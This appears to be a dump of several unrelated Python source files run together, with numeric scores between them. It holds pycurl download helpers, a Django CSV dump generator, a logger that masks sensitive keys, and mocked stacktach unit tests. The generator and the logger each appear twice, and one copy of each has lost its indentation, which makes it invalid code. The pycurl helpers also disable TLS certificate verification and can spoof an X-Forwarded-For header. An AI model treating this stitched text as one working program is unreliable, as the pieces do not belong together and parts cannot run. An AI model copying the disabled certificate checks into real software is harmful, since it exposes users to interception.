            m=re.search(r'filename=\"(.*?)\"',parseh['content-disposition'])
            if m:
                name=m.groups()[0]
        return eurl,size,name
def getdata4info(url,opts={},objc=None,objs=None,objh=None,timeout=5):
    """Perform a curl request, return (raw_header_text, raw_body_text).

    Duplicate copy; NOTE(review): mutable default ``opts={}`` (read-only).
    """
    if not objc:
        objc=pycurl.Curl()
        objc.setopt(objc.SSL_VERIFYPEER, 0) # https: certificate checks disabled
        objc.setopt(objc.SSL_VERIFYHOST, 0)
    if not objs:
        objs=StringIO.StringIO()
    if not objh:
        objh=StringIO.StringIO()
    objc.setopt(pycurl.URL,url.strip())
    objc.setopt(pycurl.TIMEOUT,timeout)
    objc.setopt(pycurl.WRITEFUNCTION, objs.write)
    objc.setopt(pycurl.HEADERFUNCTION,objh.write)
    for key,value in opts.iteritems():
        objc.setopt(key,value)
    objc.perform()
    return objh.getvalue(),objs.getvalue()
def get4url(url,curlopts={},objc=None,timeout=5):
    """Fetch *url*; implicitly returns None when *url* is falsy."""
    if url:
        return getdata4info(url,curlopts,objc,timeout=timeout)
def parsehttphead(head):
    """Parse a raw HTTP header block into a dict (lower-cased keys;
    status line under 'version'/'code'/'status')."""
    heads=head.split('\r\n')
    hdt={}
    for dt in heads:
        dt=dt.strip()
        if dt[:4]=="HTTP":
            lt=dt.split(' ')
            hdt['version']=lt[0]
            hdt['code']=lt[1]
            # Reason phrase recorded only for a three-token status line.
            if len(lt)==3:
                hdt['status']=lt[2]
            else:
                hdt['status']=''
        elif dt:
            key,value=dt.split(':',1)
            hdt[key.lower()]=value.strip()
    return hdt
def gethttpresponse(hhead,hbody):
    """Return the body, gunzipped when Content-Encoding says gzip.

    NOTE(review): dict.has_key() is Python-2-only (removed in py3).
    """
    if hhead.has_key('content-encoding') and hhead['content-encoding'].find('gzip')>=0:
        return gzip.GzipFile(fileobj=StringIO.StringIO(hbody)).read()
    else:
        return hbody
def getpyurl(copt={},proxy=None,ffx=None):
    """Return a configured pycurl handle with browser-like defaults.

    ``ffx`` (e.g. 'sgcc') adds a spoofed X-Forwarded-For header using
    getrandomip(ffx); ``copt`` options are applied last; ``proxy`` optional.
    """
    obj=pycurl.Curl()
    obj.setopt(pycurl.SSL_VERIFYPEER, 0) # https: certificate checks disabled
    obj.setopt(pycurl.SSL_VERIFYHOST, 0)
    if ffx:
        ffxip=getrandomip(ffx)
    opts={pycurl.USERAGENT:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0",\
        pycurl.HTTPHEADER:["Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",\
        "Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",\
        "Accept-Encoding: gzip, deflate",\
        "Connection: keep-alive"]
        }
    if ffx:
        opts[pycurl.HTTPHEADER].append("X-Forwarded-For: %s" %ffxip)
    for key,value in opts.iteritems():
        obj.setopt(key,value)
    if obj:
        for key,value in copt.iteritems():
            obj.setopt(key,value)
    if proxy:
        obj.setopt(pycurl.PROXY,proxy)
    return obj
def getrandomip(flag='net'):
    """Random dotted-quad IP string; flag 'sgcc' pins the first octet to 10."""
    import random
    if flag=='sgcc':
        p1=10
    else:
        p1=random.randint(1,254)
    p2=random.randint(1,254)
    p3=random.randint(1,254)
    p4=random.randint(1,254)
    return "%d.%d.%d.%d" %(p1,p2,p3,p4)
def getlinks4soup(soup,filter='link|.*',host=None):
    """Collect link URLs from a BeautifulSoup document.

    ``filter`` is "link|<regex>" or "type|<regex>" (extension match).
    NOTE(review): this duplicate keeps two apparent bugs — *host* is prepended
    to links that are ALREADY absolute (``lk[:4]=='http'`` looks inverted),
    and the 'type' branch passes the split list ``filter`` to re.search
    instead of ``filter[1]``.
    """
    lks=[]
    import re
    tags={'a':'href','img':'src','link':'src','javascript':'src'}
    filter=filter.split('|')
    for key,value in tags.iteritems():
        links=soup.findAll(key)
        for link in links:
            lk=link[value].strip()
            if host and lk[:4]=='http':
                lk=host+lk
            if filter[0]=='link' and re.search(filter[1],lk):
                lks.append(lk)
            elif filter[0]=='type':
                inx=lk.rfind('.')
                if inx and re.search(filter,lk[inx+1:]):
                    lks.append(lk)
    return lks
def getdomain4url(urls):
    """Return the "scheme://netloc" prefix of *urls*."""
    up=urlparse.urlsplit(urls)
    return "%s://%s" %(up.scheme,up.netloc)
def u28quote(string):
    """Percent-encode a unicode string as UTF-8 (urllib2.quote wrapper)."""
    return urllib2.quote(string.encode('utf8'))
def geteffectiveurl(objc,url,nums=3):
    """Follow up to *nums* redirects manually; None if still redirecting."""
    objc.setopt(pycurl.FOLLOWLOCATION,0)
    for i in range(nums):
        head,body=get4url(url,{},objc)
        hdict=parsehttphead(head)
        if hdict.has_key('location'):
            url=hdict['location']
            continue
        return url.strip()
    return None
"""
def downdata4info(downinfo,fhand,num,threadvars):
objc=threadvars['objc']
#objs=threadvars['objs']
objc.setopt(objc.SSL_VERIFYPEER, 0) # https
objc.setopt(objc.SSL_VERIFYHOST, 0)
objc.setopt(pycurl.URL,downinfo['location'])
objs=StringIO.StringIO()
#objc.setopt(objc.VERBOSE, 1)
#objc.setopt(objc.DEBUGFUNCTION, test)
objc.setopt(pycurl.WRITEFUNCTION, objs.write)
#objc.setopt(pycurl.HEADERFUNCTION,objh.write)
#objc.setopt(pycurl.FOLLOWLOCATION, 1)
#objc.setopt(pycurl.HTTPHEADER,['Range: 0-1024'])
#objc.setopt(pycurl.HEADER,True) #get head and body from stringio
#objc.setopt(pycurl.WRITEHEADER,h)
objc.setopt(pycurl.RANGE,"%d-%d" %(num*downinfo['block'],(num+1)*downinfo['block']-1))
#objc.setopt(pycurl.USERAGENT,"netdisk;5.3.4.5;PC;PC-Windows;6.2.9200;WindowsBaiduYunGuanJia")
#objc.setopt(pycurl.PROXY,"http://127.0.0.1:8088")
objc.perform()
flock.acquire()
fhand.seek(num*downinfo['block'])
fhand.write(objs.getvalue())
downinfo['status'][num]=1
flock.release()
objs.close()
threadvars['speed']=objc.getinfo(objc.SPEED_DOWNLOAD)/1024
print "HTTP-code:", objc.getinfo(objc.HTTP_CODE)
print "Total-time:", objc.getinfo(objc.TOTAL_TIME)
print "Download speed: %.2f bytes/second" % objc.getinfo(objc.SPEED_DOWNLOAD)
print "Document size: %d bytes" % objc.getinfo(objc.SIZE_DOWNLOAD)
print "Effective URL:", objc.getinfo(objc.EFFECTIVE_URL)
print "Content-type:", objc.getinfo(objc.CONTENT_TYPE)
print "Namelookup-time:", objc.getinfo(objc.NAMELOOKUP_TIME)
print "Redirect-time:", objc.getinfo(objc.REDIRECT_TIME)
print "Redirect-count:", objc.getinfo(objc.REDIRECT_COUNT)
print "====================="
""" | 0.096408 | 0.060418 |
import os
import json
from django.conf import settings
from django.contrib.contenttypes.models import ContentType
from django_datajsonar.models import Field, Catalog, Metadata
from series_tiempo_ar_api.apps.dump.generator.metadata import MetadataCsvGenerator
from series_tiempo_ar_api.apps.dump.generator.sources import SourcesCsvGenerator
from series_tiempo_ar_api.apps.dump.generator.values_csv import ValuesCsvGenerator
from series_tiempo_ar_api.apps.management import meta_keys
from series_tiempo_ar_api.apps.dump.models import GenerateDumpTask
from series_tiempo_ar_api.libs.datajsonar_repositories.series_repository import SeriesRepository
from .full_csv import FullCsvGenerator
class DumpGenerator:
dump_dir = os.path.join(settings.MEDIA_ROOT, 'dump')
def __init__(self, task: GenerateDumpTask, catalog: str = None):
self.fields = {}
self.themes = {}
self.task = task
self.catalog = catalog
self.init_data()
if not os.path.exists(self.dump_dir):
os.makedirs(self.dump_dir)
def init_data(self):
"""Inicializa en un diccionario con IDs de series como clave los valores a escribir en cada
uno de los CSV.
"""
fields = SeriesRepository.get_available_series().exclude(identifier=None)
if self.catalog:
try:
catalog = Catalog.objects.get(identifier=self.catalog)
except Catalog.DoesNotExist:
return
fields = fields.filter(
distribution__dataset__catalog=catalog
)
fields = fields.prefetch_related(
'distribution',
'distribution__dataset',
'distribution__dataset__catalog',
'enhanced_meta',
)
all_meta = Metadata.objects.all()
field_ct = ContentType.objects.get_for_model(Field)
for field in fields:
meta = json.loads(field.metadata)
dist_meta = json.loads(field.distribution.metadata)
dataset_meta = json.loads(field.distribution.dataset.metadata)
themes = field.distribution.dataset.themes
theme_labels = get_theme_labels(json.loads(themes)) if themes else ''
self.fields[field.identifier] = {
'dataset': field.distribution.dataset,
'distribution': field.distribution,
'serie': field,
'serie_titulo': field.title,
'serie_unidades': meta.get('units'),
'serie_descripcion': meta.get('description'),
'distribucion_titulo': dist_meta.get('title'),
'distribucion_descripcion': dist_meta.get('description'),
'distribucion_url_descarga': field.distribution.download_url,
'dataset_responsable': dataset_meta.get('publisher', {}).get('name'),
'dataset_fuente': dataset_meta.get('source'),
'dataset_titulo': field.distribution.dataset.title,
'dataset_descripcion': dataset_meta.get('description'),
'dataset_tema': theme_labels,
'metadata': {o.key: o.value for o in list(all_meta.filter(content_type=field_ct, object_id=field.id))},
'frequency': self.serie_periodicity(field),
}
def serie_periodicity(self, field):
return meta_keys.get(field, meta_keys.PERIODICITY) or meta_keys.get(field.distribution, meta_keys.PERIODICITY)
def generate(self):
if not self.fields:
GenerateDumpTask.info(self.task, f"No hay series cargadas para el catálogo {self.catalog}")
return
FullCsvGenerator(self.task, self.fields, self.catalog).generate()
ValuesCsvGenerator(self.task, self.fields, self.catalog).generate()
SourcesCsvGenerator(self.task, self.fields, self.catalog).generate()
MetadataCsvGenerator(self.task, self.fields, self.catalog).generate()
def get_theme_labels(themes: list):
"""Devuelve un string con los labels de themes del dataset separados por comas"""
labels = []
for theme in themes:
labels.append(theme['label'])
return ','.join(labels) | series_tiempo_ar_api/apps/dump/generator/generator.py | import os
import json
from django.conf import settings
from django.contrib.contenttypes.models import ContentType
from django_datajsonar.models import Field, Catalog, Metadata
from series_tiempo_ar_api.apps.dump.generator.metadata import MetadataCsvGenerator
from series_tiempo_ar_api.apps.dump.generator.sources import SourcesCsvGenerator
from series_tiempo_ar_api.apps.dump.generator.values_csv import ValuesCsvGenerator
from series_tiempo_ar_api.apps.management import meta_keys
from series_tiempo_ar_api.apps.dump.models import GenerateDumpTask
from series_tiempo_ar_api.libs.datajsonar_repositories.series_repository import SeriesRepository
from .full_csv import FullCsvGenerator
class DumpGenerator:
dump_dir = os.path.join(settings.MEDIA_ROOT, 'dump')
def __init__(self, task: GenerateDumpTask, catalog: str = None):
self.fields = {}
self.themes = {}
self.task = task
self.catalog = catalog
self.init_data()
if not os.path.exists(self.dump_dir):
os.makedirs(self.dump_dir)
def init_data(self):
"""Inicializa en un diccionario con IDs de series como clave los valores a escribir en cada
uno de los CSV.
"""
fields = SeriesRepository.get_available_series().exclude(identifier=None)
if self.catalog:
try:
catalog = Catalog.objects.get(identifier=self.catalog)
except Catalog.DoesNotExist:
return
fields = fields.filter(
distribution__dataset__catalog=catalog
)
fields = fields.prefetch_related(
'distribution',
'distribution__dataset',
'distribution__dataset__catalog',
'enhanced_meta',
)
all_meta = Metadata.objects.all()
field_ct = ContentType.objects.get_for_model(Field)
for field in fields:
meta = json.loads(field.metadata)
dist_meta = json.loads(field.distribution.metadata)
dataset_meta = json.loads(field.distribution.dataset.metadata)
themes = field.distribution.dataset.themes
theme_labels = get_theme_labels(json.loads(themes)) if themes else ''
self.fields[field.identifier] = {
'dataset': field.distribution.dataset,
'distribution': field.distribution,
'serie': field,
'serie_titulo': field.title,
'serie_unidades': meta.get('units'),
'serie_descripcion': meta.get('description'),
'distribucion_titulo': dist_meta.get('title'),
'distribucion_descripcion': dist_meta.get('description'),
'distribucion_url_descarga': field.distribution.download_url,
'dataset_responsable': dataset_meta.get('publisher', {}).get('name'),
'dataset_fuente': dataset_meta.get('source'),
'dataset_titulo': field.distribution.dataset.title,
'dataset_descripcion': dataset_meta.get('description'),
'dataset_tema': theme_labels,
'metadata': {o.key: o.value for o in list(all_meta.filter(content_type=field_ct, object_id=field.id))},
'frequency': self.serie_periodicity(field),
}
def serie_periodicity(self, field):
return meta_keys.get(field, meta_keys.PERIODICITY) or meta_keys.get(field.distribution, meta_keys.PERIODICITY)
def generate(self):
if not self.fields:
GenerateDumpTask.info(self.task, f"No hay series cargadas para el catálogo {self.catalog}")
return
FullCsvGenerator(self.task, self.fields, self.catalog).generate()
ValuesCsvGenerator(self.task, self.fields, self.catalog).generate()
SourcesCsvGenerator(self.task, self.fields, self.catalog).generate()
MetadataCsvGenerator(self.task, self.fields, self.catalog).generate()
def get_theme_labels(themes: list):
"""Devuelve un string con los labels de themes del dataset separados por comas"""
labels = []
for theme in themes:
labels.append(theme['label'])
return ','.join(labels) | 0.437103 | 0.155335 |
import logging
from bse import defaults
from bse.transform import Jsonable
from typing import Any, Dict, List
class BSELogger(logging.getLoggerClass()): # type: ignore
def _context(self, kwargs: Dict[str, Any]) -> None:
kwargs["extra"] = kwargs.get("extra", {})
kwargs["extra"]["context"] = kwargs["extra"].get("context", "")
def _tryjsonify(self, msg: Any) -> Any:
if isinstance(msg, dict):
# make a copy to mask values
msg = dict(msg)
for k in defaults.MASK_KEYS:
v = msg.get(k)
if v and isinstance(v, str):
msg[k] = "*" * len(v)
try:
msg = Jsonable.dump(msg)
except Exception:
pass
elif isinstance(msg, list) or isinstance(msg, Jsonable):
try:
msg = Jsonable.dump(msg)
except Exception:
pass
return msg
def info(self, msg: Any, *args: List[Any], **kwargs: Dict[str, Any]) -> None:
self._context(kwargs)
msg = self._tryjsonify(msg)
super().info(msg, *args, **kwargs)
def warning(self, msg: Any, *args: List[Any], **kwargs: Dict[str, Any]) -> None:
self._context(kwargs)
msg = self._tryjsonify(msg)
super().warning(msg, *args, **kwargs)
def error(self, msg: Any, *args: List[Any], **kwargs: Dict[str, Any]) -> None:
self._context(kwargs)
msg = self._tryjsonify(msg)
super().error(msg, *args, **kwargs)
def critical(self, msg: Any, *args: List[Any], **kwargs: Dict[str, Any]) -> None:
self._context(kwargs)
msg = self._tryjsonify(msg)
super().critical(msg, *args, **kwargs)
def exception(self, msg: Any, *args: List[Any], **kwargs: Dict[str, Any]) -> None:
self._context(kwargs)
msg = self._tryjsonify(msg)
super().exception(msg, *args, **kwargs)
def debug(self, msg: Any, *args: List[Any], **kwargs: Dict[str, Any]) -> None:
self._context(kwargs)
msg = self._tryjsonify(msg)
super().debug(msg, *args, **kwargs)
logging.setLoggerClass(BSELogger)
Logger = logging.Logger
def new(name: str) -> Logger:
# Create a custom logger
logger = logging.getLogger(name)
log_format = logging.Formatter(
"%(asctime)s [%(levelname)s] %(name)s%(context)s - %(message)s"
)
log_level = logging.DEBUG
logger.setLevel(log_level)
for handler in logger.handlers:
if isinstance(handler, logging.StreamHandler):
handler.setLevel(log_level)
handler.setFormatter(log_format)
break
else:
c_handler = logging.FileHandler(filename=defaults.LOG)
c_handler.setLevel(log_level)
c_handler.setFormatter(log_format)
logger.addHandler(c_handler)
return logger | bse/logger.py |
import logging
from bse import defaults
from bse.transform import Jsonable
from typing import Any, Dict, List
class BSELogger(logging.getLoggerClass()): # type: ignore
def _context(self, kwargs: Dict[str, Any]) -> None:
kwargs["extra"] = kwargs.get("extra", {})
kwargs["extra"]["context"] = kwargs["extra"].get("context", "")
def _tryjsonify(self, msg: Any) -> Any:
if isinstance(msg, dict):
# make a copy to mask values
msg = dict(msg)
for k in defaults.MASK_KEYS:
v = msg.get(k)
if v and isinstance(v, str):
msg[k] = "*" * len(v)
try:
msg = Jsonable.dump(msg)
except Exception:
pass
elif isinstance(msg, list) or isinstance(msg, Jsonable):
try:
msg = Jsonable.dump(msg)
except Exception:
pass
return msg
def info(self, msg: Any, *args: List[Any], **kwargs: Dict[str, Any]) -> None:
self._context(kwargs)
msg = self._tryjsonify(msg)
super().info(msg, *args, **kwargs)
def warning(self, msg: Any, *args: List[Any], **kwargs: Dict[str, Any]) -> None:
self._context(kwargs)
msg = self._tryjsonify(msg)
super().warning(msg, *args, **kwargs)
def error(self, msg: Any, *args: List[Any], **kwargs: Dict[str, Any]) -> None:
self._context(kwargs)
msg = self._tryjsonify(msg)
super().error(msg, *args, **kwargs)
def critical(self, msg: Any, *args: List[Any], **kwargs: Dict[str, Any]) -> None:
self._context(kwargs)
msg = self._tryjsonify(msg)
super().critical(msg, *args, **kwargs)
def exception(self, msg: Any, *args: List[Any], **kwargs: Dict[str, Any]) -> None:
self._context(kwargs)
msg = self._tryjsonify(msg)
super().exception(msg, *args, **kwargs)
def debug(self, msg: Any, *args: List[Any], **kwargs: Dict[str, Any]) -> None:
self._context(kwargs)
msg = self._tryjsonify(msg)
super().debug(msg, *args, **kwargs)
logging.setLoggerClass(BSELogger)
Logger = logging.Logger
def new(name: str) -> Logger:
# Create a custom logger
logger = logging.getLogger(name)
log_format = logging.Formatter(
"%(asctime)s [%(levelname)s] %(name)s%(context)s - %(message)s"
)
log_level = logging.DEBUG
logger.setLevel(log_level)
for handler in logger.handlers:
if isinstance(handler, logging.StreamHandler):
handler.setLevel(log_level)
handler.setFormatter(log_format)
break
else:
c_handler = logging.FileHandler(filename=defaults.LOG)
c_handler.setLevel(log_level)
c_handler.setFormatter(log_format)
logger.addHandler(c_handler)
return logger | 0.638497 | 0.08733 |
import datetime
import json
import mox
import utils
from utils import BANDWIDTH_PUBLIC_OUTBOUND
from utils import INSTANCE_FLAVOR_ID_1
from utils import INSTANCE_FLAVOR_ID_2
from utils import INSTANCE_ID_1
from utils import OS_VERSION_1
from utils import OS_ARCH_1
from utils import OS_DISTRO_1
from utils import RAX_OPTIONS_1
from utils import MESSAGE_ID_1
from utils import REQUEST_ID_1
from utils import TENANT_ID_1
from utils import INSTANCE_TYPE_ID_1
from utils import DUMMY_TIME
from utils import INSTANCE_TYPE_ID_2
from stacktach import stacklog, models
from stacktach import notification
from stacktach import views
from tests.unit import StacktachBaseTestCase
class StacktachRawParsingTestCase(StacktachBaseTestCase):
def setUp(self):
self.mox = mox.Mox()
views.STACKDB = self.mox.CreateMockAnything()
def tearDown(self):
self.mox.UnsetStubs()
def assertOnHandlerResponse(self, resp, **kwargs):
for key in kwargs:
self.assertTrue(key in resp, msg='%s not in response' % key)
self.assertEqual(resp[key], kwargs[key])
def test_process_raw_data(self):
deployment = self.mox.CreateMockAnything()
when = '2013-1-25 13:38:23.123'
dict = {
'timestamp': when,
}
routing_key = 'monitor.info'
args = (routing_key, dict)
json_args = json.dumps(args)
mock_record = self.mox.CreateMockAnything()
mock_notification = self.mox.CreateMockAnything()
mock_notification.save().AndReturn(mock_record)
self.mox.StubOutWithMock(notification, 'notification_factory')
exchange = 'nova'
notification.notification_factory(dict, deployment, routing_key,
json_args, exchange).AndReturn(
mock_notification)
self.mox.ReplayAll()
self.assertEquals(
views.process_raw_data(deployment, args, json_args, exchange),
(mock_record, mock_notification))
self.mox.VerifyAll()
def test_process_raw_data_old_timestamp(self):
deployment = self.mox.CreateMockAnything()
when = '2013-1-25T13:38:23.123'
dict = {
'_context_timestamp': when,
}
routing_key = 'monitor.info'
args = ('monitor.info', dict)
json_args = json.dumps(args[1])
mock_notification = self.mox.CreateMockAnything()
mock_notification.save()
self.mox.StubOutWithMock(notification, 'notification_factory')
exchange = 'nova'
notification.notification_factory(dict, deployment, routing_key,
json_args, exchange).AndReturn(mock_notification)
self.mox.ReplayAll()
views.process_raw_data(deployment, args, json_args, exchange)
self.mox.VerifyAll()
class StacktachLifecycleTestCase(StacktachBaseTestCase):
def setUp(self):
self.mox = mox.Mox()
views.STACKDB = self.mox.CreateMockAnything()
def tearDown(self):
self.mox.UnsetStubs()
def test_start_kpi_tracking_not_update(self):
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.create.start'
self.mox.ReplayAll()
views.start_kpi_tracking(None, raw)
self.mox.VerifyAll()
def test_start_kpi_tracking_not_from_api(self):
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.update'
raw.service = 'compute'
self.mox.ReplayAll()
views.start_kpi_tracking(None, raw)
self.mox.VerifyAll()
def test_start_kpi_tracking(self):
lifecycle = self.mox.CreateMockAnything()
tracker = self.mox.CreateMockAnything()
when = utils.decimal_utc()
raw = utils.create_raw(self.mox, when, 'compute.instance.update',
host='nova.example.com', service='api')
views.STACKDB.create_request_tracker(lifecycle=lifecycle,
request_id=REQUEST_ID_1,
start=when,
last_timing=None,
duration=str(0.0))\
.AndReturn(tracker)
views.STACKDB.save(tracker)
self.mox.ReplayAll()
views.start_kpi_tracking(lifecycle, raw)
self.mox.VerifyAll()
def test_start_kpi_tracking_not_using_host(self):
lifecycle = self.mox.CreateMockAnything()
tracker = self.mox.CreateMockAnything()
when = utils.decimal_utc()
raw = utils.create_raw(self.mox, when, 'compute.instance.update',
host='api.example.com', service='compute')
self.mox.ReplayAll()
views.start_kpi_tracking(lifecycle, raw)
self.mox.VerifyAll()
def test_update_kpi_no_trackers(self):
raw = self.mox.CreateMockAnything()
raw.request_id = REQUEST_ID_1
views.STACKDB.find_request_trackers(request_id=REQUEST_ID_1)\
.AndReturn([])
self.mox.ReplayAll()
views.update_kpi(None, raw)
self.mox.VerifyAll()
def test_update_kpi(self):
lifecycle = self.mox.CreateMockAnything()
end = utils.decimal_utc()
raw = self.mox.CreateMockAnything()
raw.request_id = REQUEST_ID_1
raw.when=end
timing = utils.create_timing(self.mox, 'compute.instance.create',
lifecycle, end_when=end)
start = utils.decimal_utc()
tracker = utils.create_tracker(self.mox, REQUEST_ID_1, lifecycle,
start)
views.STACKDB.find_request_trackers(request_id=REQUEST_ID_1)\
.AndReturn([tracker])
views.STACKDB.save(tracker)
self.mox.ReplayAll()
views.update_kpi(timing, raw)
self.assertEqual(tracker.request_id, REQUEST_ID_1)
self.assertEqual(tracker.lifecycle, lifecycle)
self.assertEqual(tracker.last_timing, timing)
self.assertEqual(tracker.start, start)
self.assertEqual(tracker.duration, end-start)
self.mox.VerifyAll()
def test_aggregate_lifecycle_no_instance(self):
raw = self.mox.CreateMockAnything()
raw.instance = None
self.mox.ReplayAll()
views.aggregate_lifecycle(raw)
self.mox.VerifyAll()
def test_aggregate_lifecycle_start(self):
event_name = 'compute.instance.create'
event = '%s.start' % event_name
when = datetime.datetime.utcnow()
raw = utils.create_raw(self.mox, when, event, state='building')
views.STACKDB.find_lifecycles(instance=INSTANCE_ID_1).AndReturn([])
lifecycle = self.mox.CreateMockAnything()
lifecycle.instance = INSTANCE_ID_1
views.STACKDB.create_lifecycle(instance=INSTANCE_ID_1)\
.AndReturn(lifecycle)
views.STACKDB.save(lifecycle)
views.STACKDB.find_timings(name=event_name, lifecycle=lifecycle)\
.AndReturn([])
timing = utils.create_timing(self.mox, event_name, lifecycle)
views.STACKDB.create_timing(lifecycle=lifecycle, name=event_name)\
.AndReturn(timing)
views.STACKDB.save(timing)
self.mox.ReplayAll()
views.aggregate_lifecycle(raw)
self.assertEqual(lifecycle.last_raw, raw)
self.assertEqual(lifecycle.last_state, 'building')
self.assertEqual(lifecycle.last_task_state, '')
self.assertEqual(timing.name, event_name)
self.assertEqual(timing.lifecycle, lifecycle)
self.assertEqual(timing.start_raw, raw)
self.assertEqual(timing.start_when, when)
self.mox.VerifyAll()
def test_aggregate_lifecycle_end(self):
event_name = 'compute.instance.create'
start_event = '%s.end' % event_name
end_event = '%s.end' % event_name
start_when = datetime.datetime.utcnow()
end_when = datetime.datetime.utcnow()
start_raw = utils.create_raw(self.mox, start_when, start_event,
state='building')
end_raw = utils.create_raw(self.mox, end_when, end_event,
old_task='build')
lifecycle = utils.create_lifecycle(self.mox, INSTANCE_ID_1,
'active', '', start_raw)
views.STACKDB.find_lifecycles(instance=INSTANCE_ID_1)\
.AndReturn([lifecycle])
views.STACKDB.save(lifecycle)
timing = utils.create_timing(self.mox, event_name, lifecycle,
start_raw=start_raw,
start_when=start_when)
views.STACKDB.find_timings(name=event_name, lifecycle=lifecycle)\
.AndReturn([timing])
self.mox.StubOutWithMock(views, "update_kpi")
views.update_kpi(timing, end_raw)
views.STACKDB.save(timing)
self.mox.ReplayAll()
views.aggregate_lifecycle(end_raw)
self.assertEqual(lifecycle.last_raw, end_raw)
self.assertEqual(lifecycle.last_state, 'active')
self.assertEqual(lifecycle.last_task_state, 'build')
self.assertEqual(timing.name, event_name)
self.assertEqual(timing.lifecycle, lifecycle)
self.assertEqual(timing.start_raw, start_raw)
self.assertEqual(timing.start_when, start_when)
self.assertEqual(timing.end_raw, end_raw)
self.assertEqual(timing.end_when, end_when)
self.assertEqual(timing.diff, end_when-start_when)
self.mox.VerifyAll()
def test_aggregate_lifecycle_update(self):
event = 'compute.instance.update'
when = datetime.datetime.utcnow()
raw = utils.create_raw(self.mox, when, event, old_task='reboot')
views.STACKDB.find_lifecycles(instance=INSTANCE_ID_1).AndReturn([])
lifecycle = self.mox.CreateMockAnything()
lifecycle.instance = INSTANCE_ID_1
views.STACKDB.create_lifecycle(instance=INSTANCE_ID_1).AndReturn(lifecycle)
views.STACKDB.save(lifecycle)
self.mox.StubOutWithMock(views, "start_kpi_tracking")
views.start_kpi_tracking(lifecycle, raw)
self.mox.ReplayAll()
views.aggregate_lifecycle(raw)
self.assertEqual(lifecycle.last_raw, raw)
self.assertEqual(lifecycle.last_state, 'active')
self.assertEqual(lifecycle.last_task_state, 'reboot')
self.mox.VerifyAll()
class StacktachUsageParsingTestCase(StacktachBaseTestCase):
def setUp(self):
self.mox = mox.Mox()
views.STACKDB = self.mox.CreateMockAnything()
self.log = self.mox.CreateMockAnything()
self.mox.StubOutWithMock(stacklog, 'get_logger')
def tearDown(self):
self.mox.UnsetStubs()
def setup_mock_log(self, name=None):
if name is None:
stacklog.get_logger(name=mox.IgnoreArg(),
is_parent=False).AndReturn(self.log)
else:
stacklog.get_logger(name=name,
is_parent=False).AndReturn(self.log)
def test_all_instance_events_have_mapping(self):
for key, value in views.INSTANCE_EVENT.items():
msg = "'%s' does not have a process function mapping." % value
self.assertTrue(value in views.USAGE_PROCESS_MAPPING, msg)
def _create_mock_notification(self):
notification = self.mox.CreateMockAnything()
notification.launched_at = str(DUMMY_TIME)
notification.tenant = TENANT_ID_1
notification.rax_options = RAX_OPTIONS_1
notification.os_architecture = OS_ARCH_1
notification.os_version = OS_VERSION_1
notification.os_distro = OS_DISTRO_1
notification.instance = INSTANCE_ID_1
notification.request_id = REQUEST_ID_1
notification.instance_type_id = INSTANCE_TYPE_ID_1
notification.instance_flavor_id = INSTANCE_FLAVOR_ID_1
return notification
def test_process_usage_for_new_launch_create_start(self):
notification = self._create_mock_notification()
notification.instance_flavor_id = INSTANCE_FLAVOR_ID_1
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.create.start'
usage = self.mox.CreateMockAnything()
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_new_launch(raw, notification)
self.assertEquals(usage.instance_type_id, INSTANCE_TYPE_ID_1)
self.assertEquals(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.assertEquals(usage.instance_flavor_id, INSTANCE_FLAVOR_ID_1)
self.mox.VerifyAll()
def test_process_usage_for_new_launch_rescue_start(self):
notification = self._create_mock_notification()
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.rescue.start'
usage = self.mox.CreateMockAnything()
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_new_launch(raw, notification)
self.assertEquals(usage.instance_type_id, INSTANCE_TYPE_ID_1)
self.assertEquals(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.mox.VerifyAll()
def test_process_usage_for_new_launch_rebuild_start(self):
notification = self._create_mock_notification()
notification.instance_flavor_id = INSTANCE_FLAVOR_ID_1
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.rebuild.start'
usage = self.mox.CreateMockAnything()
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_new_launch(raw, notification)
self.assertEquals(usage.instance_type_id, INSTANCE_TYPE_ID_1)
self.assertEquals(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.assertEquals(usage.instance_flavor_id, INSTANCE_FLAVOR_ID_1)
self.mox.VerifyAll()
def test_process_usage_for_new_launch_rebuild_start_when_no_launched_at_in_db(self):
notification = self._create_mock_notification()
notification.instance_flavor_id = INSTANCE_FLAVOR_ID_1
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.rebuild.start'
usage = self.mox.CreateMockAnything()
usage.launched_at = None
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_new_launch(raw, notification)
self.assertEqual(usage.launched_at, utils.decimal_utc(DUMMY_TIME))
self.assertEquals(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
